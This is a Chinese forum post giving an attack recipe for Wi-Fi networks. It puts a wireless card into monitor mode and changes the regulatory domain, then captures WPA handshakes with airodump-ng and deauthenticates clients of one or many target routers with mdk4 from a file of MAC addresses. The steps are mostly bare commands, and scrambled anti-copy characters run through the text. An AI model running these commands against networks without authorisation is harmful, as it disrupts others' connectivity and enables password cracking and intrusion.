少校
- 注册时间
- 2013-3-19
- 金币
- 2055 个
- 威望
- 17 个
- 荣誉
- 0 个
累计签到:107 天 连续签到:1 天 [LV.200]无线新星
|
本帖最后由 xun73tian 于 2025-3-12 16:13 编辑
/ E( I& I o5 v& `) B% e$ O4 \; @) z1 v' \
airodump-ng抓包步骤:单网卡+ b. x {; a( [7 @/ }& x
一、终端一:选择攻击的路由! S2 ^; B+ O6 d7 I- o
systemctl stop NetworkManager
0 c1 z! {3 P+ z. D, ?& N# hairmon-ng check kill
, r C I7 e+ P5 G3 riw reg get (查看国家监管域,默认为00)9 S8 { t# Z2 D" N _
iw reg set IN (临时设置全局国家监管域为IN)
& o( f( p5 w% Z& w或者
+ ` x% X- V4 X+ g# z& P/ L7 diw reg set PA/ h' y) w* t0 o( s
9 G/ g/ K. U! f/ p9 X- K. D" j. Jiwconfig (查看无线网卡信息)
, b+ g9 i0 z6 r* {" gairmon-ng start wlan1 (开启无线网卡监听模式)& N) i, ]' ^4 w S
airodump-ng wlan1 --band a (扫描5.0G的路由)
0 k. W U3 f& T& i4 ^5 A! {或者
0 d6 M! j" y9 N; d5 wairodump-ng wlan1 --band bg (扫描2.4G的路由)
3 l* F1 B* l$ ^: K, G2 M) M
2 r3 _1 h" l! H* [airodump-ng -w 包命名 -c 信道 --bssid 路由地址 wlan13 b! M: j8 G Z! ]
//抓取握手包,被动抓包(适应于2.4G和5.0G)
; n0 p: Y, \: j* ]6 J0 u5 I9 ]4 n1 `
二、终端二:mdk4攻击+ K* k; [7 p# q1 X. X# {
mdk4 wlan1 d -B 路由地址 (攻击具体路由)
+ P" n7 R; m: e1 ?$ Y4 ~
5 @6 P( S# W, r6 T2 I0 r9 Smdk4批量攻击路由:补充# {: b8 U9 J, C$ |9 Z2 }
把要攻击的目标MAC写入到/root/1.txt文本中。1 y {4 L, u1 f/ g
echo 6C:B1:58:E8:0C:60 >1.txt (覆盖输入)
3 `: K% p! q/ o7 m- _echo 6C:B1:58:E8:0C:61 >>1.txt (追加输入)
3 i' i. `8 D* dmdk4 wlan1 d -b ./1.txt (可同时攻击2.4和5G) |
|